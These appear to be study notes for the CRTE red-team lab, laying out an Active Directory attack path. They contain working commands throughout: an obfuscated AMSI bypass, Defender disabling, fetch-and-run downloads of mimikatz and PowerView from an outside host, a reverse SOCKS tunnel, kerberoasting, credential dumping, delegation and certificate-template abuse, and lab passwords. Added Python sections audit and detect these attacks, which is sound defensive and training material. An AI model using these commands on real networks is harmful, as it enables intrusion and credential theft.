
CRTE - Certified Red Team Expert

  1. AMSI bypass - PowerUp - Disable firewall and Defender - Chisel
```bash
# RDP into the student VM, sharing ./shared as a drive
xfreerdp /u:studentuser /p:'password' /v:192.168.100.19:3389 /h:1080 /w:1920 /floatbar /smart-sizing -grab-keyboard +drive:shared,./shared
```
```powershell
# AMSI bypass (obfuscated one-liner)
S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )
```
```powershell
iex (iwr http://host/powerup.ps1 -UseBasicParsing)
Invoke-AllChecks
Invoke-ServiceAbuse -Name ALG -UserName us\studentuserx -Verbose
```
```powershell
Set-MpPreference -DisableRealTimeMonitoring $true
Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -DisableIntrusionPreventionSystem $true
```
```bash
# on the attacker host: chisel server that accepts reverse tunnels
/t/chisel64 server -p 4437 --reverse
```
```powershell
iwr http://host/chisel.exe -outfile chisel.exe
# reverse SOCKS proxy: port 8880 on the chisel server exits into this host's network
.\chisel.exe client 192.168.99.19:4437 R:8880:socks
```
  1. bloodhound.py
```bash
# 'sock' is the author's wrapper that sends the command through the chisel SOCKS proxy (assumed, e.g. a proxychains alias)
sock bloodhound-python -dc dbvendor.local. -ns 192.168.23.1 -d dbvendor.local -u db19svc -p 'Password123!' --dns-tcp --dns-timeout 10
```
  1. kerberoasting
```bash
sock GetUserSPNs.py us.techcorp.local/studentuser:password -target-domain eu.local -outputfile kerberoast_eu.local
# -m 13100 = Kerberos 5 TGS-REP etype 23 (RC4), the format GetUserSPNs.py writes
hashcat -m 13100 kerberoast_eu.local adtools/kerberoast/10k-worst-pass.txt
```
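The detection counterpart of the step above: a kerberoast shows up on the DC as Security event 4769 (service ticket requested), typically with RC4 encryption (etype 0x17, the one `-m 13100` cracks) and as a burst of requests for many different service accounts from one user. The following Python is an added example, not part of the original notes; the 4769 records are constructed sample data with the real EventData field names, and the thresholds are assumptions to tune per environment.

```python
"""Kerberoasting detection over Windows Security event 4769 records.

Added example (not part of the original notes). The events below are
constructed sample data, not real logs; field names follow 4769 EventData.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events: one account requests four user-account SPNs
# with RC4 within seconds, followed by normal AES activity from another user.
SAMPLE_4769 = [
    {"TimeCreated": "2024-05-01T10:00:01", "TargetUserName": "studentuser@US.TECHCORP.LOCAL",
     "ServiceName": "db19svc", "TicketEncryptionType": "0x17", "IpAddress": "192.168.100.19"},
    {"TimeCreated": "2024-05-01T10:00:02", "TargetUserName": "studentuser@US.TECHCORP.LOCAL",
     "ServiceName": "appsvc", "TicketEncryptionType": "0x17", "IpAddress": "192.168.100.19"},
    {"TimeCreated": "2024-05-01T10:00:03", "TargetUserName": "studentuser@US.TECHCORP.LOCAL",
     "ServiceName": "provisioningsvc", "TicketEncryptionType": "0x17", "IpAddress": "192.168.100.19"},
    {"TimeCreated": "2024-05-01T10:00:04", "TargetUserName": "studentuser@US.TECHCORP.LOCAL",
     "ServiceName": "sqlsvc", "TicketEncryptionType": "0x17", "IpAddress": "192.168.100.19"},
    {"TimeCreated": "2024-05-01T10:05:00", "TargetUserName": "alice@US.TECHCORP.LOCAL",
     "ServiceName": "US-WEB$", "TicketEncryptionType": "0x12", "IpAddress": "192.168.100.50"},
    {"TimeCreated": "2024-05-01T10:06:00", "TargetUserName": "alice@US.TECHCORP.LOCAL",
     "ServiceName": "krbtgt", "TicketEncryptionType": "0x12", "IpAddress": "192.168.100.50"},
]

RC4_HMAC = 0x17  # etype 23; tickets with this etype are what hashcat -m 13100 cracks


def is_roastable_service(name):
    """User accounts with an SPN have human-chosen passwords. Machine accounts
    (name$) and krbtgt have long random passwords and are not worth cracking."""
    return not name.endswith("$") and name.lower() != "krbtgt"


def rc4_service_tickets(events):
    """Events where a user-account service ticket was issued with RC4."""
    return [e for e in events
            if int(e["TicketEncryptionType"], 16) == RC4_HMAC
            and is_roastable_service(e["ServiceName"])]


def burst_requesters(events, min_services=3, window=timedelta(minutes=5)):
    """Accounts that requested >= min_services distinct roastable services
    inside `window`. Returns {requester: sorted service names}."""
    by_user = defaultdict(list)
    for e in events:
        if is_roastable_service(e["ServiceName"]):
            by_user[e["TargetUserName"]].append(
                (datetime.fromisoformat(e["TimeCreated"]), e["ServiceName"]))
    hits = {}
    for user, reqs in by_user.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):          # slide the window start over each request
            in_window = {svc for t, svc in reqs[i:] if t - t0 <= window}
            if len(in_window) >= min_services:
                hits[user] = sorted(in_window)
                break
    return hits


if __name__ == "__main__":
    for e in rc4_service_tickets(SAMPLE_4769):
        print("RC4 service ticket:", e["TargetUserName"], "->", e["ServiceName"], "from", e["IpAddress"])
    for user, services in burst_requesters(SAMPLE_4769).items():
        print("Burst of SPN requests:", user, services)
```

Both signals are needed in practice: a single RC4 request is common in environments that still have RC4 enabled, and a burst alone can be a legitimate tool touching many services, but one account requesting a handful of distinct user-account SPNs with RC4 in a few seconds is the pattern GetUserSPNs.py leaves behind. Tuning RC4 off for service accounts (AES-only in msDS-SupportedEncryptionTypes) also makes the cracked output far slower to break.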

Once you have access to a normal machine:

  1. mimikatz logonpasswords, vault cred
```powershell
iwr http://host/elara_pe_win64.exe -outfile elara_pe_win64.exe
.\elara_pe_win64.exe http://host/mimikatz.exe privilege::debug sekurlsa::logonpasswords sekurlsa::ekeys '""lsadump::lsa /patch""' '""lsadump::trust /patch""' vault::cred exit
```
  1. check if the user has access to other machines
```bash
# 'hosts' is a file with one target per line
sock nxc smb hosts -u user -p pass
```
```powershell
iex (iwr http://host/powerview.ps1 -UseBasicParsing)
Find-LocalAdminAccess -Verbose
```
  1. enumerate the file system
```powershell
cd c:\
dir
cd c:\users\user
tree /F
```
  1. enumerate the local certificate store
```powershell
certutil -store My
```
  1. check if any ACL has been missed by BloodHound
```powershell
iex (iwr http://host/powerview.ps1 -UseBasicParsing)
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "managers"}
# to get more details
Get-DomainObjectAcl -Identity machineadmins -ResolveGUIDs | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_} | ?{$_.IdentityName -match 'managers'}
```

Enumeration:

  1. Enumerate LAPS
```bash
sock nxc ldap DC_HOST -d DOMAIN -u USER -p PASSWORD --module laps
# module options are passed with lowercase -o
sock nxc ldap DC_HOST -d DOMAIN -u USER -p PASSWORD --module laps -o computer="us-d*"
```
  1. Enumerate gMSA
```powershell
Get-DomainObject -LDAPFilter '(objectClass=msDS-GroupManagedServiceAccount)'
```
```bash
sock bloodyAD --host 192.168.1.2 -u studentuser19 -p 'sP8wEmrK4BK2XzGv' -d us.techcorp.local get search --filter '(objectClass=msDS-GroupManagedServiceAccount)'
# check msDS-GroupMSAMembership.ACL.Trustee to see who can read the password
```
```bash
# read the gMSA password with an account that is allowed to retrieve it
sock nxc ldap us-dc -u provisioningsvc -p 'T0OverseethegMSAaccounts!!' --gmsa
```
  1. Enumerate domains in the forest
```powershell
iex (iwr http://host/powerview.ps1 -UseBasicParsing)
Get-ForestDomain
```
  1. Enumerate trusts for the domain
```powershell
Get-DomainTrust
Get-DomainTrust -Domain techcorp.local
```
  1. Enumerate trusts for the forest
```powershell
Get-ForestTrust
```
  1. Enumerate external trusts
```powershell
Get-ForestDomain -Verbose | Get-DomainTrust | ?{$_.TrustAttributes -eq 'FILTER_SIDS'}
```

In a bidirectional trust, or an inbound one-way trust from eu.local to us.techcorp.local, we can enumerate the eu.local forest:

```powershell
Get-ForestTrust -Forest eu.local
```
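The values the trust enumeration above and the Trust section below key on (FILTER_SIDS, FOREST_TRANSITIVE, TREAT_AS_EXTERNAL, WITHIN_FOREST, TGT delegation) are bits of the `trustAttributes` attribute of each `trustedDomain` object. The following Python is an added example, not part of the original notes or of PowerView: it decodes that bitmask with the MS-ADTS flag names (PowerView prints 0x4 as FILTER_SIDS), reports the trust configurations that the later sections treat as weak, and implements the RID >= 1000 group check used in the SID-history step. The trust records and group list are constructed sample data, not the lab's real values; only the domain SID in the group check is taken from the notes.

```python
"""Decode trustAttributes / trustDirection of trustedDomain objects and report
what each trust allows across the boundary.

Added example, not part of the original notes. Flag values are the MS-ADTS
trustAttributes bits; the trust and group records below are constructed."""

TRUST_ATTRIBUTES = {
    0x0001: "NON_TRANSITIVE",
    0x0002: "UPLEVEL_ONLY",
    0x0004: "QUARANTINED_DOMAIN",        # shown by PowerView as FILTER_SIDS
    0x0008: "FOREST_TRANSITIVE",
    0x0010: "CROSS_ORGANIZATION",
    0x0020: "WITHIN_FOREST",
    0x0040: "TREAT_AS_EXTERNAL",         # set by netdom trust /enablesidhistory:yes
    0x0080: "USES_RC4_ENCRYPTION",
    0x0200: "CROSS_ORGANIZATION_NO_TGT_DELEGATION",
    0x0400: "PIM_TRUST",
    0x0800: "CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION",
}
DIRECTION = {0: "Disabled", 1: "Inbound", 2: "Outbound", 3: "Bidirectional"}

# Constructed sample trusts as seen from us.techcorp.local (attribute values are assumptions).
SAMPLE_TRUSTS = [
    {"name": "techcorp.local", "trustDirection": 3, "trustAttributes": 0x20},
    {"name": "eu.local",       "trustDirection": 3, "trustAttributes": 0x8 | 0x800},
    {"name": "dbvendor.local", "trustDirection": 3, "trustAttributes": 0x8 | 0x4},
    {"name": "euvendor.local", "trustDirection": 3, "trustAttributes": 0x8 | 0x40},
    {"name": "bastion.local",  "trustDirection": 1, "trustAttributes": 0x8 | 0x400},
]


def decode_trust_attributes(value):
    """Bitmask -> flag names, lowest bit first."""
    return [name for bit, name in sorted(TRUST_ATTRIBUTES.items()) if value & bit]


def assess_trust(trust):
    """Explain what the flag combination permits across this trust."""
    flags = set(decode_trust_attributes(trust["trustAttributes"]))
    findings = []
    if "WITHIN_FOREST" in flags:
        findings.append("intra-forest trust: no SID filtering, compromising one domain compromises the forest")
    elif "FOREST_TRANSITIVE" in flags:
        if "QUARANTINED_DOMAIN" in flags:
            findings.append("forest trust with SID filter quarantine: only SIDs of the trusted domain itself are accepted")
        else:
            findings.append("forest trust without quarantine: SID history with RID >= 1000 from the trusted forest is accepted")
        if "TREAT_AS_EXTERNAL" in flags:
            findings.append("SID history explicitly enabled on the forest trust (netdom /enablesidhistory)")
    elif "QUARANTINED_DOMAIN" not in flags:
        findings.append("external trust without SID filter quarantine: SID history from the trusted domain is accepted")
    if "CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION" in flags:
        findings.append("TGT delegation enabled across the trust: unconstrained-delegation hosts on the other side can receive this forest's TGTs")
    if "PIM_TRUST" in flags:
        findings.append("PIM/PAM trust: shadow principals of the bastion forest are honoured here")
    return {"name": trust["name"], "direction": DIRECTION[trust["trustDirection"]],
            "flags": sorted(flags), "findings": findings}


def rid(sid):
    """Relative identifier: the last sub-authority of a SID."""
    return int(sid.rsplit("-", 1)[1])


def sid_history_candidates(groups, trusted_domain_sid):
    """Groups of the trusted domain whose RID is >= 1000, i.e. the ones forest-trust
    SID filtering does not strip (the Get-ADGroup 'SID -ge ...-1000' check)."""
    return [name for name, sid in groups.items()
            if sid.startswith(trusted_domain_sid + "-") and rid(sid) >= 1000]


# Domain SID from the notes; the group names and RIDs are constructed.
EUVENDOR_DOMAIN_SID = "S-1-5-21-4066061358-3942393892-617142613"
SAMPLE_GROUPS = {
    "Domain Admins": EUVENDOR_DOMAIN_SID + "-512",
    "Enterprise Admins": EUVENDOR_DOMAIN_SID + "-519",
    "EUVendor-DBAdmins": EUVENDOR_DOMAIN_SID + "-1103",
    "Other-Domain-Group": "S-1-5-21-1111-2222-3333-1200",
}

if __name__ == "__main__":
    for t in SAMPLE_TRUSTS:
        r = assess_trust(t)
        print(r["name"], r["direction"], r["flags"])
        for f in r["findings"]:
            print("   -", f)
    print("RID >= 1000 groups:", sid_history_candidates(SAMPLE_GROUPS, EUVENDOR_DOMAIN_SID))
```

From the defending side the same decoder answers the audit questions: every forest trust should carry QUARANTINED_DOMAIN unless SID history is a documented requirement, TGT delegation should stay disabled (Get-ADTrust exposes it as the TGTDelegation property), and intra-forest trusts are a reminder that the forest, not the domain, is the boundary, so a child domain's krbtgt is as sensitive as the root's.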
  1. Enumerate machines trusted for unconstrained delegation
```powershell
Get-DomainComputer -Unconstrained
```

If such machines exist and one is compromised, extract tickets with sekurlsa::tickets if any are already present, or force the domain controller to authenticate to it with the printer bug:

```powershell
iwr http://host/Loader.exe -outfile Loader.exe
set-variable -name Pwn -Value monitor
# Rubeus monitor: watch for new TGTs every 5 seconds (printed as base64 kirbi)
.\Loader.exe -Path http://host/Rubeus.exe -args $Pwn /interval:5
```
```bash
sock python printerbug.py us.techcorp.local/webmaster:'0wnerOftheIntraNetz!'@us-dc us-web
# you can also request authentication from the parent domain DC @techcorp-dc.techcorp.local (page 96)
base64 -d us-dc.ccache.b64 > us-dc.ccache.kirbi
ticketConverter.py ~/crte/us-dc.ccache.kirbi ~/crte/us-dc.ccache
KRB5CCNAME='us-dc.ccache' sock nxc smb us-dc --use-kcache
KRB5CCNAME='/home/chdoge/crte/us-dc.ccache' sock secretsdump.py us-dc.us.techcorp.local -k -no-pass -just-dc-user us/krbtgt
```

If TGT Delegation is enabled across forests trusts, we can abuse the printer bug across two-way forest trusts as well.

You can find TGT delegation status on bloodhound if you enumerated the other forest or check notes from the labs.

Assume it is enabled

  1. Enumerate accounts trusted for constrained delegation
```powershell
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth
```

Assume Protocol transition is enabled for now

```bash
sock getST.py -spn CIFS/us-mssql.us.techcorp.local -impersonate Administrator us.techcorp.local/appsvc:'Us$rT0AccessDBwithImpersonation' #-altservice HTTP
# both HTTP and CIFS work with secretsdump
KRB5CCNAME='Administrator@[email protected]' sock secretsdump.py us.techcorp.local/[email protected] -k -no-pass
```
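What the two enumeration steps above (unconstrained, constrained with or without protocol transition) read from AD is a handful of `userAccountControl` bits plus `msDS-AllowedToDelegateTo`. The following Python is an added example, not part of the original notes or of PowerView: it classifies accounts from those attributes, explains what each kind can do (including why `-altservice` works: the listed SPN's host, not its service class, is what matters), and lists privileged accounts that neither the "sensitive and cannot be delegated" flag nor Protected Users membership shields from impersonation. The account records are constructed sample data; the UAC bit values are the documented ones.

```python
"""Kerberos delegation audit from userAccountControl / msDS-AllowedToDelegateTo.

Added example, not part of the original notes. The accounts are constructed
sample data; bit values are the documented userAccountControl flags."""

UF_WORKSTATION_TRUST_ACCOUNT = 0x1000
UF_SERVER_TRUST_ACCOUNT = 0x2000                 # domain controllers
UF_TRUSTED_FOR_DELEGATION = 0x80000               # unconstrained delegation
UF_NOT_DELEGATED = 0x100000                       # "account is sensitive and cannot be delegated"
UF_TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000     # constrained delegation with protocol transition

# Constructed sample accounts (names echo the lab, attribute values are assumptions).
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "US-DC$", "userAccountControl": UF_SERVER_TRUST_ACCOUNT | UF_TRUSTED_FOR_DELEGATION, "memberOf": []},
    {"sAMAccountName": "US-WEB$", "userAccountControl": UF_WORKSTATION_TRUST_ACCOUNT | UF_TRUSTED_FOR_DELEGATION, "memberOf": []},
    {"sAMAccountName": "appsvc", "userAccountControl": 0x200 | UF_TRUSTED_TO_AUTH_FOR_DELEGATION,
     "msDS-AllowedToDelegateTo": ["CIFS/us-mssql.us.techcorp.local", "CIFS/us-mssql"], "memberOf": []},
    {"sAMAccountName": "websvc", "userAccountControl": 0x200,
     "msDS-AllowedToDelegateTo": ["HTTP/us-web.us.techcorp.local"], "memberOf": []},
    {"sAMAccountName": "Administrator", "userAccountControl": 0x200, "memberOf": ["Domain Admins"]},
    {"sAMAccountName": "ea-admin", "userAccountControl": 0x200 | UF_NOT_DELEGATED, "memberOf": ["Enterprise Admins"]},
    {"sAMAccountName": "svc-backup", "userAccountControl": 0x200, "memberOf": ["Protected Users", "Backup Operators"]},
]


def delegation_kind(account):
    """Classify an account by the delegation it is configured for."""
    uac = account["userAccountControl"]
    if uac & UF_SERVER_TRUST_ACCOUNT:
        return "domain controller"            # unconstrained by design, expected
    if uac & UF_TRUSTED_FOR_DELEGATION:
        return "unconstrained"
    if account.get("msDS-AllowedToDelegateTo"):
        if uac & UF_TRUSTED_TO_AUTH_FOR_DELEGATION:
            return "constrained, protocol transition"
        return "constrained, Kerberos only"
    return "none"


def audit_delegation(accounts):
    """(name, kind, detail) for every non-DC account that can impersonate users."""
    findings = []
    for a in accounts:
        kind = delegation_kind(a)
        if kind == "unconstrained":
            findings.append((a["sAMAccountName"], kind,
                             "stores the forwarded TGT of every principal that authenticates to it"))
        elif kind.startswith("constrained"):
            # The service class of the SPN is not protected in the ticket, so any
            # service on these hosts is reachable (the -altservice trick).
            hosts = sorted({spn.split("/", 1)[1] for spn in a["msDS-AllowedToDelegateTo"]})
            detail = "can get tickets to any service on " + ", ".join(hosts)
            if kind.endswith("protocol transition"):
                detail += " as any user, without that user ever authenticating to it"
            findings.append((a["sAMAccountName"], kind, detail))
    return findings


def exposed_privileged(accounts, privileged_groups):
    """Members of privileged groups that can still be impersonated via delegation:
    neither NOT_DELEGATED nor Protected Users membership is set."""
    out = []
    for a in accounts:
        if not set(a["memberOf"]) & privileged_groups:
            continue
        protected = a["userAccountControl"] & UF_NOT_DELEGATED or "Protected Users" in a["memberOf"]
        if not protected:
            out.append(a["sAMAccountName"])
    return out


if __name__ == "__main__":
    for name, kind, detail in audit_delegation(SAMPLE_ACCOUNTS):
        print(f"{name}: {kind}: {detail}")
    print("privileged but delegatable:", exposed_privileged(SAMPLE_ACCOUNTS, {"Domain Admins", "Enterprise Admins"}))
```

The last function is the mitigation check for the `-impersonate Administrator` step: a protocol-transition account can only impersonate principals that are delegatable, so marking Tier-0 accounts as sensitive or putting them in Protected Users removes them as targets regardless of how many service accounts are misconfigured.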
  1. Enumerate ADCS
```powershell
# -config - opens the CA picker, -ping checks that the selected CA is reachable
certutil -config - -ping
```
```bash
sock nxc ldap 192.168.1.2 -u studentuser19 -p sP8wEmrK4BK2XzGv -M adcs -o BASE_DN=DC=techcorp,DC=local
```
```bash
sock certipy-ad find -u '[email protected]' -p 'sP8wEmrK4BK2XzGv' -dc-ip 192.168.1.2 -old-bloodhound
# setting -target-ip is required for this to work
sock certipy-ad req -u "[email protected]" -hashes 36ea28bfa97a992b5e85bd22485e8d52 -dc-ip 192.168.1.2 -target Techcorp-DC.techcorp.local -target-ip 192.168.1.1 -ca 'TECHCORP-DC-CA' -template 'ForAdminsofPrivilegedAccessWorkstations' -upn 'Administrator' -debug
sock certipy-ad auth -pfx administrator.pfx -dc-ip 192.168.1.2 -username Administrator -domain us.techcorp.local
# the same certificate also authenticates as Enterprise Admin in techcorp.local; the reason still has to be investigated
sock certipy-ad auth -pfx administrator.pfx -dc-ip 192.168.1.1 -username Administrator -domain techcorp.local

KRB5CCNAME='administrator.ccache' sock nxc smb us-dc -u 'Administrator' --use-kcache
```
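The `certipy req ... -upn 'Administrator'` step only works because the template lets the enrollee choose the subject, allows logon EKUs, needs no approval and is enrollable by ordinary users (the combination certipy reports as ESC1). The following Python is an added example, not part of the original notes or of certipy: it evaluates each of those conditions from the template's AD attributes so an auditor can see exactly which one to change. The template records are constructed sample data (the lab template's attribute values are assumptions); the flag constants and EKU OIDs are the documented ones.

```python
"""Audit certificate templates for enrollee-supplied identity + logon EKU (ESC1).

Added example, not part of the original notes. Template attribute values are
constructed; flag bits and EKU OIDs are the documented values."""

CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001   # msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002            # msPKI-Enrollment-Flag: CA manager approval

AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",        # Client Authentication
    "1.3.6.1.5.2.3.4",          # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",   # Smart Card Logon
    "2.5.29.37.0",              # Any Purpose
}
LOW_PRIV = {"Domain Users", "Authenticated Users", "Domain Computers"}

# Constructed sample templates: only the first meets every condition.
SAMPLE_TEMPLATES = [
    {"name": "ForAdminsofPrivilegedAccessWorkstations", "publishedAt": ["TECHCORP-DC-CA"],
     "msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0x0, "msPKI-RA-Signature": 0,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"], "enrollmentRights": ["Domain Users"]},
    {"name": "User", "publishedAt": ["TECHCORP-DC-CA"],
     "msPKI-Certificate-Name-Flag": 0xA6000000,        # subject built from AD, not supplied
     "msPKI-Enrollment-Flag": 0x0, "msPKI-RA-Signature": 0,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"], "enrollmentRights": ["Domain Users"]},
    {"name": "WebServer", "publishedAt": ["TECHCORP-DC-CA"],
     "msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0x0, "msPKI-RA-Signature": 0,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.1"],      # Server Authentication only
     "enrollmentRights": ["Domain Users"]},
    {"name": "ApprovedAdmin", "publishedAt": ["TECHCORP-DC-CA"],
     "msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0x2, "msPKI-RA-Signature": 0,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"], "enrollmentRights": ["Domain Users"]},
    {"name": "Unpublished", "publishedAt": [],
     "msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0x0, "msPKI-RA-Signature": 0,
     "pKIExtendedKeyUsage": [], "enrollmentRights": ["Authenticated Users"]},
]


def allows_logon(ekus):
    """An empty pKIExtendedKeyUsage means the certificate is valid for all purposes."""
    return not ekus or bool(AUTH_EKUS & set(ekus))


def esc1_conditions(tpl, low_priv=LOW_PRIV):
    """Each condition separately, so the report says which one to fix."""
    return {
        "published": bool(tpl["publishedAt"]),
        "enrollee_supplies_subject": bool(tpl["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT),
        "logon_eku": allows_logon(tpl["pKIExtendedKeyUsage"]),
        "no_manager_approval": not tpl["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS,
        "no_authorized_signatures": tpl["msPKI-RA-Signature"] == 0,
        "low_priv_can_enroll": bool(set(tpl["enrollmentRights"]) & low_priv),
    }


def vulnerable_templates(templates, low_priv=LOW_PRIV):
    """Names of templates meeting all conditions, i.e. any enrollee can obtain a logon cert for any UPN."""
    return [t["name"] for t in templates if all(esc1_conditions(t, low_priv).values())]


if __name__ == "__main__":
    for t in SAMPLE_TEMPLATES:
        failed = [k for k, v in esc1_conditions(t).items() if not v]
        print(t["name"], "VULNERABLE" if not failed else "blocked by: " + ", ".join(failed))
```

Breaking any one condition is enough: clearing ENROLLEE_SUPPLIES_SUBJECT (let the CA build the subject from AD), requiring manager approval, or restricting enrollment rights all close the path, and the per-condition report makes the least disruptive choice obvious.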
  1. Enumerate where Azure AD Connect is installed
```bash
sock bloodyAD --host 192.168.1.1 -u studentuser19 -p 'sP8wEmrK4BK2XzGv' -d us.techcorp.local get search --filter '(samAccountName=MSOL_*)' --attr distinguishedName,description
```

On that machine, dump credentials with logonpasswords:

```powershell
# -b is the base64 of: token::elevate privilege::debug sekurlsa::logonpasswords exit
.\elara_win64.exe pe -i http://student19:8000/mimikatz.exe -b dG9rZW46OmVsZXZhdGUgcHJpdmlsZWdlOjpkZWJ1ZyBzZWt1cmxzYTo6bG9nb25wYXNzd29yZHMgZXhpdA==
```

Then DCSync with the recovered MSOL_* credentials.

  1. Elevate from the child domain to the forest root using the child's krbtgt hash or the trust key; the trust key is equivalent to the NT hash of the trust account TECHCORP$ (techcorp.local domain) or US$ (us.techcorp.local domain).

  2. Once you gain access to another forest, don't forget to run all checks again, including kerberoastable users.

  3. Enumerate SQL access

```powershell
# PowerUpSQL.psd1 is a module manifest and cannot be loaded with iex; load the script instead
iex (iwr http://host/PowerUpSQL.ps1 -UseBasicParsing)
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
```

Trust

Intra-Forest Cross-Domain Trust Abuse (Different Domains inside the Same Forest). Do we have DA privileges on a domain INSIDE the forest?

  1. YES -> We can elevate our privileges to EA using the following methods:
    1. Abusing Parent-Child Trust Relationship to forge an Inter-Realm Golden Ticket. We need the krbtgt credentials of the compromised domain.
    2. Abusing the Trust Keys to forge an Inter-Realm Golden Ticket. We need the targetdomain$ credentials of the compromised domain.
    3. Abusing the KUD of the compromised domain’s DC (or other machine with similar privileges) and coercing the target domain’s DC to authenticate to it using PrinterBug to steal the TGT of the target DC’s machine account.
  2. NO
    1. Use Get-DomainForeignUser to find whether any user from our domain has access into other groups in the forest.
    2. Use Get-DomainForeignGroupMember -Domain OTHER.DOMAIN to see if groups in those other forest domains have "incoming" access.
    3. Kerberoasting

Inter-Forest Cross-Domain Attack (Different Domains in Different Forests)

  1. Bidirectional Inter-Forest Cross-Domain Attack (FOREST_TRANSITIVE, Bidirectional)
    • In that specific case, THE FOREST IS NOT A SECURITY BOUNDARY.
    • We may be able to abuse the KUD of the compromised domain’s DC (or other machine with similar privileges) and coercing the target domain’s DC to authenticate to it using PrinterBug to steal the TGT of the target DC’s machine account.
  2. Bidirectional Inter-Forest Cross-Domain Attack with Fully Implemented SID Filtering (FILTER_SIDS, Bidirectional)
    1. Enumerate for Local Group Membership on individual servers
    2. Enumerate for Foreign Security Principals on the target domain
    3. Enumerate for Foreign ACL Principals
    ```powershell
    Find-InterestingDomainAcl -ResolveGUIDs -Domain dbvendor.local
    ```
    4. Kerberoasting
  3. One-Way Inter-Forest Cross-Domain Attack (FOREST_TRANSITIVE, Inbound)
    1. Enumerate for Local Group Membership on individual servers.
    2. Enumerate for Foreign Security Principals on the target domain:
    3. Enumerate for Foreign ACL Principals:
    4. Kerberoasting
  4. Bidirectional External Cross-Domain Attack with SID Filtering (TREAT_AS_EXTERNAL,FOREST_TRANSITIVE, Bidirectional)
    1. Enumerate for Local Group Membership on individual servers
    2. Enumerate for Foreign Security Principals on the target domain
    3. Enumerate for Foreign ACL Principals:
    4. Kerberoasting
    5. Find interesting domain groups with RID > 1000 that could be used for SID History injection, in order to obtain that group's privileges on the target domain. To abuse this we need the targetdomain$ credentials of the compromised domain.
    ```powershell
    # the SID prefix is the target domain's SID; -ge keeps groups with RID >= 1000
    Get-ADGroup -Filter 'SID -ge "S-1-5-21-4066061358-3942393892-617142613-1000"' -Server euvendor.local
    ```
  5. Bastion Forests
    1. Look for a way to compromise the Bastion (Red) forest in order to easily gain access over all the managed Production forests.
    ```powershell
    # Get-ADObject has no -Domain parameter; -Server already targets the bastion DC
    Get-ADObject -LDAPFilter '(objectClass=foreignSecurityPrincipal)' -Server bastion-dc.bastion.local
    Get-ADGroup -Filter * -Properties Member -Server bastion.local | ?{$_.Member -match 'S-1-5-21-2781415573-3701854478-2406986946-500'}
    ```
    ```powershell
    # PowerView equivalent
    Get-DomainGroup -LDAPFilter '(member=CN=S-1-5-21-2781415573-3701854478-2406986946-500,CN=ForeignSecurityPrincipals,DC=bastion,DC=local)'
    ```
    2. Check if there is a PAM trust
    ```powershell
    Get-ADTrust -Filter {(ForestTransitive -eq $True) -and (SIDFilteringQuarantined -eq $False)}
    ```
    ```powershell
    # PowerView equivalent
    Get-DomainTrust
    ```
    3. Check which users are members of the shadow principals
    ```powershell
    $bastiondc = New-PSSession bastion-dc.bastion.local
    # run the query on the bastion DC through the session; Get-ADObject needs -Filter or -LDAPFilter
    Invoke-Command -Session $bastiondc -ScriptBlock {
        Get-ADObject -SearchBase 'CN=Shadow Principal Configuration,CN=Services,CN=Configuration,DC=bastion,DC=local' -Filter * -Properties member
    }
    ```
    If any user is a member of prodforest-ShadowEnterpriseAdmin, that account is effectively an Enterprise Admin in the production forest.

Persistence

  1. Golden ticket
  2. DCSync rights granted to a user